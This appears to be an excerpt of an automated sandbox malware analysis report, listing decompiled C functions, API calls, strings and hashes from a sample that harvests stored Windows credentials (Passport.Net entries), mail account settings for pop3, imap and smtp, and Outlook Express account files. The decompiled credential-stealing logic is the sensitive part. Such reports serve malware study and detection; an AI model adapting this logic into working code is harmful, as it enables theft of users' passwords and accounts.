                                                              0x00405673
                                                              0x00405680
                                                              0x0040568b
                                                              0x0040568d
                                                              0x00405696
                                                              0x00405697
                                                              0x0040569c
                                                              0x0040569d
                                                              0x004056a5
                                                              0x004056a7
                                                              0x004056b9
                                                              0x004056be
                                                              0x004056c3
                                                              0x004056d3
                                                              0x004056d3
                                                              0x004056c3
                                                              0x0040568b
                                                              0x004056d6
                                                              0x004056d9
                                                              0x004056dc
                                                              0x004056e0
                                                              0x004056e9
                                                              0x004056ec
                                                              0x00000000

                                                              APIs
                                                              • GetDlgItem.USER32 ref: 004055B6
                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055CF
                                                              • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055DC
                                                              • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055E8
                                                              • memset.MSVCRT ref: 00405652
                                                              • SendMessageA.USER32(?,00001019,?,?), ref: 00405683
                                                              • SetFocus.USER32(?), ref: 00405708
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                              • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                              • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                              • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E0040D5DB(char* __ebx, void* __eflags) {
                                                              				char _v8;
                                                              				short* _v12;
                                                              				int _v16;
                                                              				intOrPtr _v20;
                                                              				char _v24;
                                                              				intOrPtr _v28;
                                                              				char _v32;
                                                              				intOrPtr _v48;
                                                              				intOrPtr _v52;
                                                              				int _v56;
                                                              				char _v60;
                                                              				char _v584;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t36;
                                                              				intOrPtr _t44;
                                                              				void* _t47;
                                                              				char _t63;
                                                              				int _t69;
                                                              				void* _t74;
                                                              
                                                              				_t74 = __eflags;
                                                              				_t69 = 0;
                                                              				E004046D7( &_v584);
                                                              				_v60 = 0;
                                                              				_v56 = 0;
                                                              				_t36 = E00404647( &_v60, 0, _t74);
                                                              				_t75 = _t36;
                                                              				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
                                                              					_push( &_v8);
                                                              					_push(0);
                                                              					_push(4);
                                                              					_push("Passport.Net\\*");
                                                              					if(_v52() != 0) {
                                                              						_t44 = _v8;
                                                              						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
                                                              							_v32 =  *((intOrPtr*)(_t44 + 0x18));
                                                              							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
                                                              							_t47 = 0;
                                                              							_t63 = 0x4a;
                                                              							do {
                                                              								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
                                                              								 *(_t47 + 0x417768) =  *_t14 << 2;
                                                              								_t47 = _t47 + 2;
                                                              							} while (_t47 < _t63);
                                                              							_v24 = _t63;
                                                              							_v20 = 0x417768;
                                                              							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
                                                              								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
                                                              									strcpy(__ebx,  *(_v8 + 0x30));
                                                              									_t69 = 1;
                                                              								}
                                                              								LocalFree(_v12);
                                                              							}
                                                              							_t44 = _v8;
                                                              						}
                                                              						_v48(_t44);
                                                              					}
                                                              				}
                                                              				E004046C2( &_v60);
                                                              				E004047F1( &_v584);
                                                              				return _t69;
                                                              			}























                                                              0x0040d5db
                                                              0x0040d5ec
                                                              0x0040d5ee
                                                              0x0040d5f6
                                                              0x0040d5f9
                                                              0x0040d5fc
                                                              0x0040d601
                                                              0x0040d603
                                                              0x0040d619
                                                              0x0040d61a
                                                              0x0040d61b
                                                              0x0040d61d
                                                              0x0040d627
                                                              0x0040d62d
                                                              0x0040d633
                                                              0x0040d645
                                                              0x0040d64d
                                                              0x0040d650
                                                              0x0040d652
                                                              0x0040d653
                                                              0x0040d653
                                                              0x0040d65e
                                                              0x0040d666
                                                              0x0040d667
                                                              0x0040d67d
                                                              0x0040d680
                                                              0x0040d68e
                                                              0x0040d6af
                                                              0x0040d6c8
                                                              0x0040d6d1
                                                              0x0040d6d1
                                                              0x0040d6d5
                                                              0x0040d6d5
                                                              0x0040d6db
                                                              0x0040d6db
                                                              0x0040d6df
                                                              0x0040d6df
                                                              0x0040d627
                                                              0x0040d6e5
                                                              0x0040d6f0
                                                              0x0040d6fa

                                                              APIs
                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                              • strlen.MSVCRT ref: 0040D6B7
                                                              • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                              • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                              • String ID: Passport.Net\*$hwA
                                                              • API String ID: 3335197805-2625321100
                                                              • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                              • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                              • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                              • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 41%
                                                              			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
                                                              				int _v0;
                                                              				int _t26;
                                                              				char* _t32;
                                                              				int _t44;
                                                              				signed int _t46;
                                                              				signed int _t47;
                                                              
                                                              				_t38 = __ecx;
                                                              				_t47 = _t46 & 0xfffffff8;
                                                              				E004118A0(0x1040, __ecx);
                                                              				_t26 = GetMenuItemCount(_a8);
                                                              				_t44 = 0;
                                                              				_v0 = _t26;
                                                              				if(_t26 <= 0) {
                                                              					L13:
                                                              					return _t26;
                                                              				} else {
                                                              					goto L1;
                                                              				}
                                                              				do {
                                                              					L1:
                                                              					memset( &_a53, 0, 0x1000);
                                                              					_t47 = _t47 + 0xc;
                                                              					_a40 =  &_a52;
                                                              					_a4.cbSize = 0x30;
                                                              					_a8 = 0x36;
                                                              					_a44 = 0x1000;
                                                              					_a20 = 0;
                                                              					_a52 = 0;
                                                              					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
                                                              					if(_t26 == 0) {
                                                              						goto L12;
                                                              					}
                                                              					if(_a52 == 0) {
                                                              						L10:
                                                              						_t55 = _a24;
                                                              						if(_a24 != 0) {
                                                              							_push(0);
                                                              							_push(_a24);
                                                              							_push(_a4.cbSize);
                                                              							_t26 = E00407EFB(_t38, _t55);
                                                              							_t47 = _t47 + 0xc;
                                                              						}
                                                              						goto L12;
                                                              					}
                                                              					_t32 = strchr( &_a52, 9);
                                                              					if(_t32 != 0) {
                                                              						 *_t32 = 0;
                                                              					}
                                                              					_t33 = _a20;
                                                              					if(_a24 != 0) {
                                                              						if(_a12 == 0) {
                                                              							 *0x4171b4 =  *0x4171b4 + 1;
                                                              							_t33 =  *0x4171b4 + 0x11558;
                                                              							__eflags =  *0x4171b4 + 0x11558;
                                                              						} else {
                                                              							_t18 = _t44 + 0x11171; // 0x11171
                                                              							_t33 = _t18;
                                                              						}
                                                              					}
                                                              					_t26 = E00407EC3(_t33,  &_a52);
                                                              					_pop(_t38);
                                                              					goto L10;
                                                              					L12:
                                                              					_t44 = _t44 + 1;
                                                              				} while (_t44 < _v0);
                                                              				goto L13;
                                                              			}









                                                              0x00407efb
                                                              0x00407efe
                                                              0x00407f06
                                                              0x00407f10
                                                              0x00407f18
                                                              0x00407f1c
                                                              0x00407f20
                                                              0x00407fe5
                                                              0x00407fea
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407f26
                                                              0x00407f26
                                                              0x00407f31
                                                              0x00407f36
                                                              0x00407f3d
                                                              0x00407f4c
                                                              0x00407f54
                                                              0x00407f5c
                                                              0x00407f64
                                                              0x00407f68
                                                              0x00407f6c
                                                              0x00407f74
                                                              0x00000000
                                                              0x00000000
                                                              0x00407f7a
                                                              0x00407fc4
                                                              0x00407fc4
                                                              0x00407fc8
                                                              0x00407fca
                                                              0x00407fcb
                                                              0x00407fcf
                                                              0x00407fd2
                                                              0x00407fd7
                                                              0x00407fd7
                                                              0x00000000
                                                              0x00407fc8
                                                              0x00407f83
                                                              0x00407f8c
                                                              0x00407f8e
                                                              0x00407f8e
                                                              0x00407f94
                                                              0x00407f98
                                                              0x00407f9d
                                                              0x00407fa7
                                                              0x00407fb2
                                                              0x00407fb2
                                                              0x00407f9f
                                                              0x00407f9f
                                                              0x00407f9f
                                                              0x00407f9f
                                                              0x00407f9d
                                                              0x00407fbd
                                                              0x00407fc3
                                                              0x00000000
                                                              0x00407fda
                                                              0x00407fda
                                                              0x00407fdb
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                              • String ID: 0$6
                                                              • API String ID: 2300387033-3849865405
                                                              • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                              • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                              • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                              • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 66%
                                                              			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				char _v280;
                                                              				char _v408;
                                                              				intOrPtr _v412;
                                                              				char _v668;
                                                              				char _v796;
                                                              				intOrPtr _v800;
                                                              				char _v928;
                                                              				char _v940;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t37;
                                                              				void* _t44;
                                                              				intOrPtr _t50;
                                                              				void* _t56;
                                                              				intOrPtr _t58;
                                                              				void* _t63;
                                                              
                                                              				_t63 = __fp0;
                                                              				_t50 = __ecx;
                                                              				_v8 = __ecx;
                                                              				E004021D8( &_v940);
                                                              				_t58 = _a4;
                                                              				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
                                                              				_push(_t58 + 0x404);
                                                              				_t44 = 0x7f;
                                                              				E004060D0(_t44,  &_v796);
                                                              				E004060D0(_t44,  &_v408, _t58 + 0x204);
                                                              				E004060D0(_t44,  &_v928, _t58 + 4);
                                                              				E004060D0(_t44,  &_v668, _t58 + 0x104);
                                                              				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
                                                              				_t56 = _t58 + 0x504;
                                                              				_push("pop3");
                                                              				_push(_t56);
                                                              				L004115B2();
                                                              				if(_t37 != 0) {
                                                              					_push("imap");
                                                              					_push(_t56);
                                                              					L004115B2();
                                                              					if(_t37 != 0) {
                                                              						_push("smtp");
                                                              						_push(_t56);
                                                              						L004115B2();
                                                              						if(_t37 == 0) {
                                                              							_v412 = 4;
                                                              						}
                                                              					} else {
                                                              						_v412 = 2;
                                                              					}
                                                              				} else {
                                                              					_v412 = 1;
                                                              				}
                                                              				_v24 =  *((intOrPtr*)(_t58 + 0x804));
                                                              				_v20 =  *((intOrPtr*)(_t58 + 0x808));
                                                              				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
                                                              			}























                                                              0x004044da
                                                              0x004044e6
                                                              0x004044ee
                                                              0x004044f1
                                                              0x004044fc
                                                              0x004044ff
                                                              0x0040450b
                                                              0x0040450e
                                                              0x00404515
                                                              0x00404527
                                                              0x00404536
                                                              0x00404548
                                                              0x0040455a
                                                              0x0040455f
                                                              0x00404565
                                                              0x0040456a
                                                              0x0040456b
                                                              0x00404575
                                                              0x00404583
                                                              0x00404588
                                                              0x00404589
                                                              0x00404592
                                                              0x004045a0
                                                              0x004045a5
                                                              0x004045a6
                                                              0x004045af
                                                              0x004045b1
                                                              0x004045b1
                                                              0x00404594
                                                              0x00404594
                                                              0x00404594
                                                              0x00404577
                                                              0x00404577
                                                              0x00404577
                                                              0x004045c1
                                                              0x004045ca
                                                              0x004045e5

                                                              APIs
                                                                • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                              • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                              • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _stricmp$memcpystrlen
                                                              • String ID: imap$pop3$smtp
                                                              • API String ID: 445763297-821077329
                                                              • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                              • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                              • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                              • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                              				char _v5;
                                                              				char _v132;
                                                              				char _v404;
                                                              				char _v532;
                                                              				intOrPtr _v536;
                                                              				char _v920;
                                                              				intOrPtr _v924;
                                                              				char _v1052;
                                                              				char _v1064;
                                                              				void* __ebx;
                                                              				void* _t18;
                                                              				char* _t20;
                                                              				char* _t39;
                                                              				char* _t41;
                                                              				void* _t48;
                                                              				void* _t59;
                                                              
                                                              				_t59 = __fp0;
                                                              				_t48 = __edi;
                                                              				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
                                                              					return _t18;
                                                              				}
                                                              				_t39 =  &_v132;
                                                              				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
                                                              				if(_t20 != 0) {
                                                              					_v5 = 0;
                                                              					_t20 = strchr(_t39, 0x3a);
                                                              					_t41 = _t20;
                                                              					if(_t41 != 0) {
                                                              						 *_t41 = 0;
                                                              						E004021D8( &_v1064);
                                                              						strcpy( &_v404,  &(_t41[1]));
                                                              						strcpy( &_v532,  &_v132);
                                                              						_v924 = 7;
                                                              						_v536 = 3;
                                                              						if(strlen( &_v532) + 0xa < 0x7f) {
                                                              							sprintf( &_v920, "%s@gmail.com",  &_v532);
                                                              						}
                                                              						strcpy( &_v1052,  &_v532);
                                                              						_t20 = E00402407( &_v1064, _t59, _t48);
                                                              					}
                                                              				}
                                                              				return _t20;
                                                              			}



















                                                              0x004036cc
                                                              0x004036cc
                                                              0x004036dc
                                                              0x004037ae
                                                              0x004037ae
                                                              0x004036ed
                                                              0x004036f0
                                                              0x004036f7
                                                              0x00403702
                                                              0x00403706
                                                              0x0040370b
                                                              0x00403711
                                                              0x0040371e
                                                              0x00403721
                                                              0x0040372f
                                                              0x0040373f
                                                              0x0040374b
                                                              0x00403755
                                                              0x0040376e
                                                              0x00403783
                                                              0x00403788
                                                              0x00403799
                                                              0x004037a7
                                                              0x004037a7
                                                              0x00403711
                                                              0x00000000

                                                              APIs
                                                                • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                              • strchr.MSVCRT ref: 00403706
                                                              • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                              • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                              • strlen.MSVCRT ref: 0040375F
                                                              • sprintf.MSVCRT ref: 00403783
                                                              • strcpy.MSVCRT(?,?), ref: 00403799
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                              • String ID: %s@gmail.com
                                                              • API String ID: 2649369358-4097000612
                                                              • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                              • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                              • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                              • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
                                                              				char _v8;
                                                              				void _v1031;
                                                              				void _v1032;
                                                              				void* _t26;
                                                              				char* _t27;
                                                              				int _t32;
                                                              				int _t38;
                                                              				char* _t43;
                                                              				int _t44;
                                                              				void* _t45;
                                                              				void** _t48;
                                                              				void* _t50;
                                                              				void* _t51;
                                                              
                                                              				_t43 = __ebx;
                                                              				_t44 = 0;
                                                              				_v1032 = 0;
                                                              				memset( &_v1031, 0, 0x3ff);
                                                              				_t26 = _a8;
                                                              				_t51 = _t50 + 0xc;
                                                              				 *__ebx = 0;
                                                              				if(_t26 > 0) {
                                                              					_t48 = _a4 + 4;
                                                              					_v8 = _t26;
                                                              					do {
                                                              						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
                                                              						_t32 = strlen( &_v1032);
                                                              						_a8 = _t32;
                                                              						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
                                                              						_t45 = _t44 + _a8 + 1;
                                                              						_t38 = strlen( *_t48);
                                                              						_a8 = _t38;
                                                              						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
                                                              						_t51 = _t51 + 0x30;
                                                              						_t48 =  &(_t48[2]);
                                                              						_t18 =  &_v8;
                                                              						 *_t18 = _v8 - 1;
                                                              						_t44 = _t45 + _a8 + 1;
                                                              					} while ( *_t18 != 0);
                                                              				}
                                                              				_t27 = _t44 + _t43;
                                                              				 *_t27 = 0;
                                                              				 *((char*)(_t27 + 1)) = 0;
                                                              				return _t43;
                                                              			}
















                                                              0x0040684d
                                                              0x0040685c
                                                              0x00406866
                                                              0x0040686d
                                                              0x00406872
                                                              0x00406875
                                                              0x0040687a
                                                              0x0040687d
                                                              0x00406883
                                                              0x00406886
                                                              0x00406889
                                                              0x0040689a
                                                              0x004068a6
                                                              0x004068ab
                                                              0x004068bb
                                                              0x004068c5
                                                              0x004068c9
                                                              0x004068ce
                                                              0x004068d9
                                                              0x004068e1
                                                              0x004068e4
                                                              0x004068e7
                                                              0x004068e7
                                                              0x004068ea
                                                              0x004068ea
                                                              0x004068f0
                                                              0x004068f1
                                                              0x004068f4
                                                              0x004068f7
                                                              0x004068ff

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memcpystrlen$memsetsprintf
                                                              • String ID: %s (%s)
                                                              • API String ID: 3756086014-1363028141
                                                              • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                              • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                              • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                              • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 25%
                                                              			E0040E906(void* __ebx, int _a4, void* _a8) {
                                                              				char _v20;
                                                              				char _v36;
                                                              				char _v52;
                                                              				void* _t15;
                                                              				void* _t17;
                                                              				void* _t28;
                                                              				intOrPtr* _t31;
                                                              				int _t32;
                                                              
                                                              				_t28 = __ebx;
                                                              				_t31 = __imp__UuidFromStringA;
                                                              				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
                                                              				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
                                                              				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
                                                              					return 0;
                                                              				} else {
                                                              					_t32 = _a4;
                                                              					if(_t32 > 0x7e) {
                                                              						_t32 = 0x7e;
                                                              					}
                                                              					memcpy(_t28, _a8, _t32);
                                                              					 *((char*)(_t28 + _t32)) = 0;
                                                              					__imp__CoTaskMemFree(_a8);
                                                              					return 1;
                                                              				}
                                                              			}











                                                              0x0040e906
                                                              0x0040e90d
                                                              0x0040e91d
                                                              0x0040e92a
                                                              0x0040e92e
                                                              0x00000000
                                                              0x0040e956
                                                              0x0040e956
                                                              0x0040e95c
                                                              0x0040e960
                                                              0x0040e960
                                                              0x0040e966
                                                              0x0040e971
                                                              0x0040e975
                                                              0x00000000
                                                              0x0040e97d

                                                              APIs
                                                              • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                              • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                              • memcpy.MSVCRT ref: 0040E966
                                                              • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                              Strings
                                                              • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                              • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                              • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                              • API String ID: 1640410171-3316789007
                                                              • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                              • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                              • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                              • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
                                                              				void* _t12;
                                                              				void* _t15;
                                                              				char* _t19;
                                                              				void* _t25;
                                                              				void* _t28;
                                                              				long _t31;
                                                              
                                                              				_t12 = E00405ECB(_a8);
                                                              				_a8 = _t12;
                                                              				if(_t12 != 0xffffffff) {
                                                              					_t31 = GetFileSize(_t12, 0);
                                                              					_t37 = _t31 - 2;
                                                              					if(_t31 > 2) {
                                                              						_t3 = _t31 + 2; // 0x2
                                                              						_t15 = _t3;
                                                              						L004115D0();
                                                              						_t25 = _t15;
                                                              						_t28 = _t15;
                                                              						SetFilePointer(_a8, 2, 0, 0);
                                                              						_t5 = _t31 - 2; // -2
                                                              						E004066F6(_t25, _a8, _t28, _t5);
                                                              						_t19 = _t28 + _t31;
                                                              						 *((char*)(_t19 - 2)) = 0;
                                                              						 *((char*)(_t19 - 1)) = 0;
                                                              						 *_t19 = 0;
                                                              						E00410A8A(_t25, _t37, _a4, _t28);
                                                              						_push(_t28);
                                                              						L004115D6();
                                                              					}
                                                              					return CloseHandle(_a8);
                                                              				}
                                                              				return _t12;
                                                              			}









                                                              0x00410bcd
                                                              0x00410bd6
                                                              0x00410bd9
                                                              0x00410be7
                                                              0x00410be9
                                                              0x00410bec
                                                              0x00410bee
                                                              0x00410bee
                                                              0x00410bf3
                                                              0x00410bf8
                                                              0x00410c00
                                                              0x00410c02
                                                              0x00410c08
                                                              0x00410c10
                                                              0x00410c18
                                                              0x00410c1f
                                                              0x00410c22
                                                              0x00410c25
                                                              0x00410c27
                                                              0x00410c2c
                                                              0x00410c2d
                                                              0x00410c33
                                                              0x00000000
                                                              0x00410c3e
                                                              0x00410c40

                                                              APIs
                                                                • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                                • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                                • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                                • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
